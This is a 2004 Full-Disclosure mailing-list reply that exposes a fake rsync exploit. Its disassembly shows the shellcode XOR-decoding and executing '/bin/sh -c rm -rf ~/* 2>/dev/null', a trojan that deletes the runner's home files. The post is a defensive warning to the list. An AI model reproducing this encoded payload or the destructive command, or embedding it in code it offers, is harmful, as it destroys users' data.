Full Disclosure mailing list archives

Re: new rsync :) exploit rsync-too-open

From: Blue Boar <BlueBoar () thievco com>
Date: Fri, 28 May 2004 17:04:10 -0700

dkey wrote:

"nice mail"...but if somebody wants to use it, check the shellcode first...ithink it deletes all your files in your home dir. i'm not sure, maybesomebody else can check it...


Yes.

seg000:00000000 ; Segment type: Pure code
seg000:00000000 seg000          segment byte public 'CODE' use32
seg000:00000000                 assume cs:seg000

seg000:00000000 assume es:nothing, ss:nothing,ds:nothing, fs:nothing, gs:nothing

seg000:00000000                 jmp     short loc_12
seg000:00000002

seg000:00000002 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦

seg000:00000002
seg000:00000002

seg000:00000002 sub_2 proc near ; CODE XREF:sub_2+10p

seg000:00000002     pop     esi             ; ESI = addr of decode section
seg000:00000003     xor     ecx, ecx        ; ECX = 0
seg000:00000005     mov     cl, 75          ; loop 75 times
seg000:00000007     mov     al, 255         ; XOR value start
seg000:00000009

seg000:00000009 decode_loop: ; CODE XREF:sub_2+Cjseg000:00000009 xor [esi], al ; XOR currentbyte in decode section with AL

seg000:0000000B     dec     al              ; AL = AL - 1
seg000:0000000D     inc     esi             ; next byte
seg000:0000000E     loop    decode_loop
seg000:00000010     jmp     short decoded

seg000:00000012 ;---------------------------------------------------------------------------

seg000:00000012
seg000:00000012 loc_12:                     ; CODE XREF: seg000:00000000j
seg000:00000012     call    sub_2           ; push addr of decode section
seg000:00000017
seg000:00000017 decoded:                    ; CODE XREF: sub_2+Ej
seg000:00000017     call    loc_41          ; push addr of "\bin\sh"

seg000:00000017 ;---------------------------------------------------------------------------

seg000:0000001C aBinSh          db '/bin/sh',0
seg000:00000024 aSh             db 'sh',0
seg000:00000027 aC              db '-c',0
seg000:0000002A aRmRf2DevNull   db 'rm -rf ~/* 2>/dev/null',0

seg000:00000041 ;---------------------------------------------------------------------------

seg000:00000041
seg000:00000041 loc_41:                     ; CODE XREF: sub_2+15p
seg000:00000041     pop     ebp             ; EBP = addr of "\bin\sh"
seg000:00000042     xor     eax, eax        ; EAX = 0
seg000:00000042 sub_2           endp
seg000:00000042
seg000:00000044     push    eax             ; 0
seg000:00000045     lea     ebx, [ebp+0Eh]
seg000:00000048     push    ebx             ; "'rm -rf ~/* 2>/dev/null"
seg000:00000049     lea     ebx, [ebp+0Bh]
seg000:0000004C     push    ebx             ; "-c"
seg000:0000004D     lea     ebx, [ebp+8]
seg000:00000050     push    ebx             ; "sh"
seg000:00000051     mov     ebx, ebp        ; "/bin/sh"
seg000:00000053     mov     ecx, esp
seg000:00000055     xor     edx, edx        ; EDX = 0
seg000:00000057     mov     al, 0Bh
seg000:00000059     int     80h             ; LINUX - sys_execve
seg000:0000005B     mov     ebx, eax        ; EBX = result
seg000:0000005D     xor     eax, eax
seg000:0000005F     inc     eax             ; exit (1)
seg000:00000060     int     80h             ; LINUX - sys_exit
seg000:00000060 seg000          ends
seg000:00000060     end

AKA "/bin/sh -c rm -rf ~/* 2>/dev/null"

                                                BB

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

new rsync :) exploit rsync-too-open haxor (May 28)
- Re: new rsync :) exploit rsync-too-open phlox (May 28)
- Re: new rsync :) exploit rsync-too-open dkey (May 28)
  - Re: new rsync :) exploit rsync-too-open Blue Boar (May 28)
- RE: new rsync :) exploit rsync-too-open listreader (May 30)